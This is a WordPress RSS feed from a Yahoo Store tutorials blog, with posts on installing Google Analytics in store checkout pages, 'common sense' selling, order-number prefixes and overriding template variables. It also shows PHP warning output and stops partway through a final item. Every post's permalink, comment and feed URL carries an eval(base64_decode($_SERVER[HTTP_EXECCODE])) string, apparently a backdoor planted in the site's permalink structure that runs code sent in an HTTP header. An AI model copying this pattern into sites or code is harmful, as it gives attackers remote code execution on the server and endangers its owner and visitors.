<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="wordpress/2.2.2" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd"
	xmlns:dtvmedia="http://participatoryculture.org/RSSModules/dtv/1.0"
	xmlns:media="http://search.yahoo.com/mrss/"
>

<channel>
	<title>Y Store Tutorials</title>
	<link>http://www.ystoretutorials.com/blog</link>
	<description>Yahoo Store Help, Tips, Information, Tutorials &#038; News</description>
	<pubDate>Wed, 17 Nov 2010 14:45:11 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.2.2</generator>
	<language>en</language>
		<!-- podcast_generator="podPress/8.5" -->
		<copyright>&#xA9; </copyright>
		<managingEditor>info@ystoretutorials.com ()</managingEditor>
		<webMaster>info@ystoretutorials.com</webMaster>
		<category></category>
		<itunes:keywords></itunes:keywords>
		<itunes:subtitle></itunes:subtitle>
		<itunes:summary>Yahoo Store Tutorials</itunes:summary>
		<itunes:author></itunes:author>
		<itunes:category text="Society &amp; Culture"/>
		<itunes:owner>
			<itunes:name></itunes:name>
			<itunes:email>info@ystoretutorials.com</itunes:email>
		</itunes:owner>
		<itunes:block>No</itunes:block>
		<itunes:explicit>no</itunes:explicit>
		<itunes:image href="http://www.ystoretutorials.com/blog/wp-content/plugins/podpress/images/powered_by_podpress_large.jpg" />
		<image>
			<url>http://www.ystoretutorials.com/blog/wp-content/plugins/podpress/images/powered_by_podpress.jpg</url>
			<title>Y Store Tutorials</title>
			<link>http://www.ystoretutorials.com/blog</link>
			<width>144</width>
			<height>144</height>
		</image>
		<item>
		<title>Setting up Google Analytics in Yahoo Stores Properly</title>
		<link>http://www.ystoretutorials.com/blog/2010/06/10/setting-up-google-analytics-in-yahoo-stores-properly/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://www.ystoretutorials.com/blog/2010/06/10/setting-up-google-analytics-in-yahoo-stores-properly/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Thu, 10 Jun 2010 20:27:35 +0000</pubDate>
		<dc:creator>Britt</dc:creator>
		
		<category><![CDATA[RTML]]></category>

		<category><![CDATA[Tips &amp; Tricks]]></category>

		<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.ystoretutorials.com/blog/50/setting-up-google-analytics-in-yahoo-stores-properly/</guid>
		<description><![CDATA[<br />
<b>Warning</b>:  preg_split() [<a href='function.preg-split'>function.preg-split</a>]: Compilation failed: lookbehind assertion is not fixed length at offset 14 in <b>/home/ystoretu/public_html/blog/wp-content/plugins/sem-fancy-excerpt/sem-fancy-excerpt.php</b> on line <b>51</b><br />
<br />
<b>Warning</b>:  Invalid argument supplied for foreach() in <b>/home/ystoretu/public_html/blog/wp-content/plugins/sem-fancy-excerpt/sem-fancy-excerpt.php</b> on line <b>53</b><br />
]]></description>
			<content:encoded><![CDATA[<p>Ya know, as little as 2 years ago, Google and Yahoo really did not play well together especially when it came to analytics. Sure your Yahoo store has some backend features and stats but its nothing compared to what Google Analytics can offer. The problem however is understanding exactly how to set it up properly on your site. Since I am asked quite often to help do this for customers, I figured I would write a self help way of doing it yourself. Of course, if you still want help, I am always for hire ;-p</p>
<p>The first thing you must do of course is signup for a Google Analtics account. I am not going to go through that process. Once you have your account setup just set it to the side for a second while we get some code in your Yahoo Store.</p>
<h2>STEP 1</h2>
<p>The first snippet of code you need is for all your store pages. Copy and paste from below and replace the XX-XXXXXX-X with YOUR Google Analytics ID. It will look something like UA-453212-5</p>
<p><span style="background-color: rgb(204, 153, 255);">&lt;script type=&quot;text/javascript&quot;&gt;</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">var gaJsHost = ((&quot;https:&quot; == document.location.protocol) ? &quot;https://ssl.&quot; : &quot;http://www.&quot;);</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">document.write(unescape(&quot;%3Cscript src=&#039;&quot; + gaJsHost + &quot;google-analytics.com/ga.js&#039; type=&#039;text/javascript&#039;%3E%3C/script%3E&quot;));</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">&lt;/script&gt;</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">&lt;script type=&quot;text/javascript&quot;&gt;</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">try {</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">var pageTracker = _gat._getTracker(&quot;<span style="background-color: rgb(255, 255, 0);">XX-XXXXXX-X</span>&quot;);</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">pageTracker._setDomainName(&quot;none&quot;);</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">pageTracker._setAllowLinker(true);</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">pageTracker._setAllowAnchor(true);</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">pageTracker._trackPageview();</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">} catch(err) {}&lt;/script&gt;</span></p>
<p>
The above code is what you will copy and paste into every page of your store (except the cart pages). The easiest way to tackle this is to goto your store editor and then VARIABLES. In that area you can use the copyright box, footer, head or any other place that will allow javascript. If you have custom templates you will probably see an area that has other head tags or other scripts that you can add this into.</p>
<h2>STEP 2</h2>
<p>After that is done, its time to add some code to your actual shopping cart pages. Under order settings from your Yahoo dashboard, goto CHECKOUT MANAGER. Then goto PAGE CONFIGURATION. Personally we use the main cart page, combined shipping and billing and order confirmation. You may be using the main cart page, shipping, billing, review and confirmation pages. Either way, there is a small change to the code you must add to each of those pages. So lets start with the Shopping Cart page first. On each of these pages, you will have an HTML HEAD SECTION at the bottom in the advanced settings area. This is where you will copy and paste your code into. Each snippet of code for your cart pages are identical with 1 small change on each.</p>
<p><span style="background-color: rgb(204, 153, 255);">&lt;script type=&quot;text/javascript&quot;&gt;</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">var gaJsHost = ((&quot;https:&quot; == document.location.protocol) ? &quot;https://ssl.&quot; : &quot;http://www.&quot;);</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">document.write(unescape(&quot;%3Cscript src=&#039;&quot; + gaJsHost + &quot;google-analytics.com/ga.js&#039; type=&#039;text/javascript&#039;%3E%3C/script%3E&quot;));</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">&lt;/script&gt;</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">&lt;script type=&quot;text/javascript&quot;&gt;</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">try {</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">var pageTracker = _gat._getTracker(&quot;<span style="background-color: rgb(255, 153, 204);">XX-XXXXXX-X</span>&quot;);</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">pageTracker._setDomainName(&quot;none&quot;);</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">pageTracker._setAllowLinker(true);</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">pageTracker._setAllowAnchor(true);</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">pageTracker._trackPageview(&quot;<span style="background-color: rgb(255, 255, 0);">/checkout-cart.html</span>&quot;);</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">} catch(err) {}&lt;/script&gt;</span></p>
<p>See that yellow part? Thats the part you have to change on each page of your checkout pages. So just the same code on each page but change the part in yellow so it matches how your checkout flows.</p>
<p>/checkout-cart.html (pretty much what every Yahoo store has as the first initial cart page)<br />
/checkout-ship-bill.html (this is the one you will use if you have shipping AND billing on 1 single page)<br />
/checkout-shipping.html (for single page shipping)<br />
/checkout-billing.html (for single page billing)<br />
/checkout-onepage.html (use this if you have a single page checkout where everything is on the same page, shipping, billing and credit card info)<br />
/checkout-review.html (use this on the review page)<br />
/checkout-status.html (use the on the page that shows order status)</p>
<p>The final piece of code is almost like the above with a couple extras. This piece is the code you paste into the confirmation page. This is the money page so be sure to get this one right.</p>
<p><span style="background-color: rgb(204, 153, 255);">&lt;script type=&quot;text/javascript&quot;&gt;</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">var gaJsHost = ((&quot;https:&quot; == document.location.protocol) ? &quot;https://ssl.&quot; : &quot;http://www.&quot;);</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">document.write(unescape(&quot;%3Cscript src=&#039;&quot; + gaJsHost + &quot;google-analytics.com/ga.js&#039; type=&#039;text/javascript&#039;%3E%3C/script%3E&quot;));</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">&lt;/script&gt;</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">&lt;script type=&quot;text/javascript&quot;&gt;</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">try {</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">var pageTracker = _gat._getTracker(&quot;<span style="background-color: rgb(255, 153, 204);">XX-XXXX-X</span>&quot;);</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">pageTracker._setDomainName(&quot;none&quot;);</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">pageTracker._setAllowLinker(true);</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">pageTracker._setAllowAnchor(true);</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">pageTracker._trackPageview(&quot;/checkout-confirm.html&quot;);</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">pageTracker._addTrans(orderNum, &quot;&quot;, orderTotal, orderTax, orderShipping, &quot;&quot;, &quot;&quot;, &quot;&quot;);</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">for(i=0;i&lt;codes.length;i++){</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">pageTracker._addItem(orderNum, codes[i], items[i], &quot;&quot;, price[i], qtys[i]);</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">}</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">pageTracker._trackTrans();</span><br style="background-color: rgb(204, 153, 255);" /><br />
<span style="background-color: rgb(204, 153, 255);">} catch(err) {}&lt;/script&gt;</span></p>
<p>Again, dont forget to change the XX-XXXXXX-XX with YOUR Google Analytics ID.</p>
<h2>STEP 3</h2>
<p>This step could present problems for some but honestly its not that tough. We need to alter a couple things in your Yahoo Store templates to make sure everything tracks properly. Basically we are adding a small amount of javascript to all your links and forms that point to your shopping cart. So, goto your Yahoo Store Editor. Click CONENTS from the advanced buttons. Now click Templates. You will have built-in templates and custom templates if you had a <a href="http://www.ytutorials.com">Yahoo Store designer</a> handle your setup. Find the template that says <em>Top-bottom-nav-links</em> and click it. Look for the line</p>
<p><font face="Comic Sans MS">CSS-WITH-LINK class WHEN AND</font></p>
<p><font face="Comic Sans MS">and click on CSS-WITH-LINK</font></p>
<p>Next click the EDIT button.<br />
In the field next to the Add button, enter onclick<br />
Click the Update button.<br />
Click the New button.<br />
In the text box next to the word simple, paste this <span style="background-color: rgb(204, 153, 255);">&quot;pageTracker._link(&#039;http://order.store.yahoo.net/cgi-bin/wg-order?catalog=yhst-<span style="background-color: rgb(255, 255, 0);">XXXXXXXXXXXXX</span>&#039;,true);&quot;</span> and be sure to include the &quot; on each side.<br />
NOTE: MAKE SURE TO REPLACE THE STORE ID yhst-XXXXXXXXXXXXX WITH YOUR ACTUAL STORE ID.<br />
Click the nil link next to the word onclick.<br />
Click the Replace button.</p>
<p>That handles the text links. Now we need to make 1 more small change so that the &quot;Add to Cart&quot; buttons or &quot;Send&quot; from your forms work.</p>
<p>Back to the template again, look for one that reads <em>Orderform</em> and click it. Now find the line that has</p>
<p><font face="Comic Sans MS">FORM destination dest</font></p>
<p><font face="Comic Sans MS">and click on FORM</font></p>
<p>Next click the EDIT button.<br />
In the field next to the Add button, enter onclick.<br />
Click the Update button.<br />
Click the New button.<br />
In the text box next to the word simple paste <font color="#000000" style="background-color: rgb(204, 153, 255);">&quot;pageTracker._linkByPost(this,true);&quot;</font><br />
Click the Create button.<br />
Click the nil link next to the word onclick.<br />
Click the Replace button.</p>
<p>Pat yourself on the back&#8230; you are now a <a href="http://www.ytutorials.com">Yahoo Store Programmer</a>!</p>
<p>Once all this is done, save all changes, publish your checkout and  publish your store again so all the changes go live.</p>
<p>Thats it for the Yahoo Store part of installing Google Analytics. Now  lets get to a few things to setup in your Google Analytics account.&nbsp;</p>
<p><strong>WATCH THIS VIDEO IF YOU NEED ADDTIONAL HELP</strong></p>
<p></br><br />
<object id="scPlayer" class="embeddedObject" width="1356" height="812" type="application/x-shockwave-flash" data="http://content.screencast.com/users/YTutorials/folders/Jing/media/2ab7d57e-dcf9-40fe-931c-ea284d60ceb1/jingh264player.swf" >
<param name="movie" value="http://content.screencast.com/users/YTutorials/folders/Jing/media/2ab7d57e-dcf9-40fe-931c-ea284d60ceb1/jingh264player.swf" />
<param name="quality" value="high" />
<param name="bgcolor" value="#FFFFFF" />
<param name="flashVars" value="thumb=http://content.screencast.com/users/YTutorials/folders/Jing/media/2ab7d57e-dcf9-40fe-931c-ea284d60ceb1/FirstFrame.jpg&#038;containerwidth=1356&#038;containerheight=812&#038;content=http://content.screencast.com/users/YTutorials/folders/Jing/media/2ab7d57e-dcf9-40fe-931c-ea284d60ceb1/Google-Analytics.mp4&#038;blurover=false" />
<param name="allowFullScreen" value="true" />
<param name="scale" value="showall" />
<param name="allowScriptAccess" value="always" />
<param name="base" value="http://content.screencast.com/users/YTutorials/folders/Jing/media/2ab7d57e-dcf9-40fe-931c-ea284d60ceb1/" /> <video width="1356" height="812" controls="controls"><br />  <source src="http://content.screencast.com/users/YTutorials/folders/Jing/media/2ab7d57e-dcf9-40fe-931c-ea284d60ceb1/Google-Analytics.mp4" type="video/mp4;" /><br />  <b>Your browser cannot play this video. <a href="http://www.screencast.com/handlers/redirect.ashx?target=viewingembededhelp">Learn how to fix this</a>.</b> </video> </object></p>
<h2>STEP 4</h2>
<p>Login to your Google Analytics account. Once there, click on edit for your site.</p>
<p><img width="920" height="96" align="baseline" src="http://www.ystoretutorials.com/blog/wp-content/uploads/image/ga-main-edit.png" alt="ga-main-edit.png" /></p>
<p>The next thing you see should be something like below. In the website profile area, click edit again.</p>
<p><img width="886" height="268" align="baseline" src="http://www.ystoretutorials.com/blog/wp-content/uploads/image/ga-main.png" alt="ga-main.png" /></p>
<p>Finally we arrive at this&#8230; fill this in with your stores information but the most important part is teh default page. Make sure you fill this in with index.html (assuming you are using the actual store from Yahoo and not tags)</p>
<p><img width="669" height="420" align="baseline" src="http://www.ystoretutorials.com/blog/wp-content/uploads/image/ga-index.png" alt="ga-index.png" /></p>
<p>Save your changes and you will be back on the Profile settings again. Below the section we were just working on is a GOALS section. Under Goals (set 1) click Add goal. You will see this as the next screen. Fill this in like I have mine setup.</p>
<p><img width="744" height="483" align="baseline" alt="ga-goal-1.png" src="http://www.ystoretutorials.com/blog/wp-content/uploads/image/ga-goal-1.png" /></p>
<p>&nbsp;<img width="804" height="324" align="baseline" alt="ga-goal-2.png" src="http://www.ystoretutorials.com/blog/wp-content/uploads/image/ga-goal-2.png" /></p>
<p>Remember, if you have a different shopping cart setup than I use, you will need to adjust those funnel pages accordingly. So go back up to see what those pages where. You just want to make sure you have exactly how the customers checkout on your store. If you have a shipping page and a billing page, you would ultimately have 1 additional&nbsp; step than I do. Save goal. Thats it! You will now be able to see exactly how many people ordered and purchased in your Google Analytics reports. Not to mention having the ecommerce overview is really nice. Play around with additional settings to get it just right and you are now able to have great data to mange your stores better.</p>
<br /><a href="http://www.socialmarker.com/?link=http://www.ystoretutorials.com/blog/2010/06/10/setting-up-google-analytics-in-yahoo-stores-properly/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/&title=Setting+up+Google+Analytics+in+Yahoo+Stores+Properly&text=Ya+know%2C+as+little+as+2+years+ago%2C+Google+and+Yahoo+really+did+not+play+well+together+especially+when+it+came+to+analytics.&tags=you+have%2C+click+the%2C+type+text%2C+you+will%2C+pagetracker%2C+click%2C+store%2C+yahoo%2C+script%2C+button%2C+pages" target="_blank"><img src= "http://www.socialmarker.com/bookmark.gif" border="0" /></a><noscript><a href="http://www.socialmarker.com" >Social Bookmarking</a></noscript>]]></content:encoded>
			<wfw:commentRss>http://www.ystoretutorials.com/blog/2010/06/10/setting-up-google-analytics-in-yahoo-stores-properly/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
<enclosure url="http://content.screencast.com/users/YTutorials/folders/Jing/media/2ab7d57e-dcf9-40fe-931c-ea284d60ceb1/Google-Analytics.mp4" length="9832009" type="video/mp4" />
	
	</item>
		<item>
		<title>Common Sense Selling</title>
		<link>http://www.ystoretutorials.com/blog/2010/04/13/common-sense-selling/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://www.ystoretutorials.com/blog/2010/04/13/common-sense-selling/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Tue, 13 Apr 2010 17:23:15 +0000</pubDate>
		<dc:creator>Britt</dc:creator>
		
		<category><![CDATA[Traffic]]></category>

		<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.ystoretutorials.com/blog/49/common-sense-selling/</guid>
		<description><![CDATA[<br />
<b>Warning</b>:  preg_split() [<a href='function.preg-split'>function.preg-split</a>]: Compilation failed: lookbehind assertion is not fixed length at offset 14 in <b>/home/ystoretu/public_html/blog/wp-content/plugins/sem-fancy-excerpt/sem-fancy-excerpt.php</b> on line <b>51</b><br />
<br />
<b>Warning</b>:  Invalid argument supplied for foreach() in <b>/home/ystoretu/public_html/blog/wp-content/plugins/sem-fancy-excerpt/sem-fancy-excerpt.php</b> on line <b>53</b><br />
]]></description>
			<content:encoded><![CDATA[<p>I apologize for not posting more often but I kinda took a hiatus for a bit to see what all these other gurus are saying and selling. I have come to the conclusing that people are so uneducated about certain things that want and need to believe all these gurus are right and what they are selling is the magic pill to their success when in fact&#8230; it cannot be further from the truth.</p>
<p>Now remember, when I am talking, I am merely talking about ecommerce sites. I don&#039;t claim to know much (or anything substantial really) about affiliate sites or affiliate marketing, etc. I am speaking just from an ecommerce store owner which is where I make my living.</p>
<p>The fact is, 95% of the stuff you hear and read is just plain bogus information or its common sense and you end up paying for something you really already know. For instance, everyone talks about ways to get more traffic and why is that? Because sales is a numbers game. The more customers you get to your site, the more sales you will make. That is just how it works. So these gurus sell you programs, information, automated systems, courses, memberships, etc to show you how to get more traffic.</p>
<p>Hello! The only way to get more traffic is to get <strong>BETTER CONTENT</strong>! That is everything people. Forgot Facebook, forget Twitter, forget links, forget blogs, forget everything. Go through your site and every single page should have alot of great, original content that is typed as if you would be talking to someone. Much like I am doing with you right here.</p>
<h2><strong>K.I.S.S.</strong></h2>
<p>You have seen this or heard this before right? Keep it simple stupid. Thats it. Don&#039;t complicate your business. Fix the content and yes, its always best to write it all yourself! Stop being lazy and stop saying &quot;I can&#039;t write&quot; cause that is total bullshit. If you can talk, you can write and noone knows your business better than you. If you want your business to do better, you better damn well learn how to write content or its time to give up and move on to something else.</p>
<p>Its not rocket science&#8230;its simply common sense.</p>
<br /><a href="http://www.socialmarker.com/?link=http://www.ystoretutorials.com/blog/2010/04/13/common-sense-selling/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/&title=Common+Sense+Selling&text=I+apologize+for+not+posting+more+often+but+I+kinda+took+a+hiatus+for+a+bit+to+see+what+all+these+other+gurus+are+saying+and+selling.&tags=get+more" target="_blank"><img src= "http://www.socialmarker.com/bookmark.gif" border="0" /></a><noscript><a href="http://www.socialmarker.com" >Social Bookmarking</a></noscript>]]></content:encoded>
			<wfw:commentRss>http://www.ystoretutorials.com/blog/2010/04/13/common-sense-selling/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
	
	</item>
		<item>
		<title>No More Long Order Numbers!</title>
		<link>http://www.ystoretutorials.com/blog/2009/07/17/no-more-long-order-numbers/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://www.ystoretutorials.com/blog/2009/07/17/no-more-long-order-numbers/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Fri, 17 Jul 2009 20:21:55 +0000</pubDate>
		<dc:creator>Britt</dc:creator>
		
		<category><![CDATA[Tips &amp; Tricks]]></category>

		<guid isPermaLink="false">http://www.ystoretutorials.com/blog/48/no-more-long-order-numbers/</guid>
		<description><![CDATA[<br />
<b>Warning</b>:  preg_split() [<a href='function.preg-split'>function.preg-split</a>]: Compilation failed: lookbehind assertion is not fixed length at offset 14 in <b>/home/ystoretu/public_html/blog/wp-content/plugins/sem-fancy-excerpt/sem-fancy-excerpt.php</b> on line <b>51</b><br />
<br />
<b>Warning</b>:  Invalid argument supplied for foreach() in <b>/home/ystoretu/public_html/blog/wp-content/plugins/sem-fancy-excerpt/sem-fancy-excerpt.php</b> on line <b>53</b><br />
]]></description>
			<content:encoded><![CDATA[<p>The one thing I was always jealous of were owners of really old Yahoo Stores or Legacy Stores as some call them. That was their order numbers were nice and neat. For example, if you were smart enough or lucky enough to get on a Yahoo platform long ago, your order numbers were typically your domain name and then the order number. So if would look something like this;</p>
<p>ytutorials-1096</p>
<p>Until recently, all the new Yahoo stores would get a really long order number that looks like this;</p>
<p><img width="448" height="165" align="baseline" src="http://www.ystoretutorials.com/blog/wp-content/uploads/image/order-number.png" alt="order-number.png" /></p>
<p>You know what I am talking about if you have ever had a customer call in to check on something and you ask them, instinctively, whats your order number? Then they reply with, hmmm must be this long number here, YST-318 bla bla bla and you stop them and go &quot;Just give me the last 4-5 digits (everything after the last hypen)&quot;. Am I right?</p>
<p>Well I was probing around my store today and noticed something new that can be done to your store to get rid of all that!</p>
<p>In your store manager, goto the <strong>Order Settings</strong> and click on <strong>Shipment &amp; Order Status </strong>(see image below)</p>
<p><img width="146" height="220" align="baseline" src="http://www.ystoretutorials.com/blog/wp-content/uploads/image/order-settings.png" alt="order-settings.png" /></p>
<p>Once here, you will see a spot for <strong>Order Number Prefix</strong> (see image below)</p>
<p><img width="1065" height="59" align="baseline" src="http://www.ystoretutorials.com/blog/wp-content/uploads/image/order-value.png" alt="order-value.png" /></p>
<p>&nbsp;</p>
<p>This particular example if from one of my stores that sells <a href="http://www.replicadungeon.com/medieval-swords.html">Medieval Swords</a> and its called ReplicaDungeon.com so I used RD as my order prefix. Now when I get orders, they come in as RD-9543</p>
<p>Tell me that aint just cool?!</p>
<p>&nbsp;</p>
<p>Have fun and hope to see you again soon.</p>
<br /><a href="http://www.socialmarker.com/?link=http://www.ystoretutorials.com/blog/2009/07/17/no-more-long-order-numbers/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/&title=No+More+Long+Order+Numbers%21&text=The+one+thing+I+was+always+jealous+of+were+owners+of+really+old+Yahoo+Stores+or+Legacy+Stores+as+some+call+them.+That+was+their+order+numbers+were+nice+and+neat.&tags=order+number%2C+order%2C+number" target="_blank"><img src= "http://www.socialmarker.com/bookmark.gif" border="0" /></a><noscript><a href="http://www.socialmarker.com" >Social Bookmarking</a></noscript>]]></content:encoded>
			<wfw:commentRss>http://www.ystoretutorials.com/blog/2009/07/17/no-more-long-order-numbers/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
	
	</item>
		<item>
		<title>Yahoo Store Final Text Variable</title>
		<link>http://www.ystoretutorials.com/blog/2009/05/01/yahoo-store-final-text-variable/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://www.ystoretutorials.com/blog/2009/05/01/yahoo-store-final-text-variable/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Fri, 01 May 2009 17:07:12 +0000</pubDate>
		<dc:creator>Britt</dc:creator>
		
		<category><![CDATA[Tips &amp; Tricks]]></category>

		<guid isPermaLink="false">http://www.ystoretutorials.com/blog/47/yahoo-store-final-text-variable/</guid>
		<description><![CDATA[<br />
<b>Warning</b>:  preg_split() [<a href='function.preg-split'>function.preg-split</a>]: Compilation failed: lookbehind assertion is not fixed length at offset 14 in <b>/home/ystoretu/public_html/blog/wp-content/plugins/sem-fancy-excerpt/sem-fancy-excerpt.php</b> on line <b>51</b><br />
<br />
<b>Warning</b>:  Invalid argument supplied for foreach() in <b>/home/ystoretu/public_html/blog/wp-content/plugins/sem-fancy-excerpt/sem-fancy-excerpt.php</b> on line <b>53</b><br />
]]></description>
			<content:encoded><![CDATA[<p>If you own and operate a Yahoo Store, then you are probably already aware of the <strong>Final-text</strong> variable. Typically, I use this variable for adding all my little store icons down at the bottom of my pages. One of my stores sells <a href="http://www.brightneonsigns.com/neon-open-signs.html">neon open signs</a> and I include my newsletter signup form, google ads, my trust seals, credit cards we accept, etc. (see image below)</p>
<p><img width="469" height="707" align="baseline" alt="store-logos.png" src="http://www.ystoretutorials.com/blog/wp-content/uploads/image/store-logos.png" /></p>
<p>&nbsp;</p>
<p>For the Final-text variable, I use raw html code and paste it into the field in my store and by doing this, all of my store pages will feature the same thing at the bottom of the pages. This way I can simply update this one field and it will update on every page of my site. This saves me time and energy and puts information I want to showcase to my customers on every page.</p>
<h2>OVERRIDE YAHOO STORE VARIABLES!</h2>
<p>Now here is the cool part. Did you know you can override that variable on ANY page in your site? Thats right! While in your store editor, you can browse to any page in your site and click the edit button, then click override variable, then choose final-text. (see images below)</p>
<p><img width="546" height="41" align="baseline" alt="override-variable.png" src="http://www.ystoretutorials.com/blog/wp-content/uploads/image/override-variable.png" /></p>
<p>&nbsp;</p>
<p><img width="418" height="390" align="baseline" alt="final-text.png" src="http://www.ystoretutorials.com/blog/wp-content/uploads/image/final-text.png" /></p>
<p>&nbsp;</p>
<p>Now after you do this, you will have a custom area at the bottom of the page you are editing where you can completely change the <strong>Final-text </strong>area for that one page only. By doing this, for example on the site we sell <a href="http://www.brightneonsigns.com/neon-signs.html">neon signs</a>, I have a different Final-text for my home page than I do for all my other pages. This way I control exactly what I want and where I want it.</p>
<p>This method for overriding variables can be done with tons of other stuff to. As you can see by the picture above, you can override availability of certain items or change the thumbnail picture sizes. Play around with this feature. Its a great little option for Yahoo Store owners.</p>
<br /><a href="http://www.socialmarker.com/?link=http://www.ystoretutorials.com/blog/2009/05/01/yahoo-store-final-text-variable/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/&title=Yahoo+Store+Final+Text+Variable&text=If+you+own+and+operate+a+Yahoo+Store%2C+then+you+are+probably+already+aware+of+the+Final-text+variable.&tags=you+can%2C+the+bottom%2C+store%2C+variable%2C+final-text" target="_blank"><img src= "http://www.socialmarker.com/bookmark.gif" border="0" /></a><noscript><a href="http://www.socialmarker.com" >Social Bookmarking</a></noscript>]]></content:encoded>
			<wfw:commentRss>http://www.ystoretutorials.com/blog/2009/05/01/yahoo-store-final-text-variable/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
	
	</item>
		<item>
		<title>Multiple Inset Image Uploads</title>
		<link>http://www.ystoretutorials.com/blog/2009/04/14/multiple-inset-image-uploads/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://www.ystoretutorials.com/blog/2009/04/14/multiple-inset-image-uploads/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Tue, 14 Apr 2009 15:14:00 +0000</pubDate>
		<dc:creator>Britt</dc:creator>
		
		<category><![CDATA[Tips &amp; Tricks]]></category>

		<guid isPermaLink="false">http://www.ystoretutorials.com/blog/46/multiple-inset-image-uploads/</guid>
		<description><![CDATA[<br />
<b>Warning</b>:  preg_split() [<a href='function.preg-split'>function.preg-split</a>]: Compilation failed: lookbehind assertion is not fixed length at offset 14 in <b>/home/ystoretu/public_html/blog/wp-content/plugins/sem-fancy-excerpt/sem-fancy-excerpt.php</b> on line <b>51</b><br />
<br />
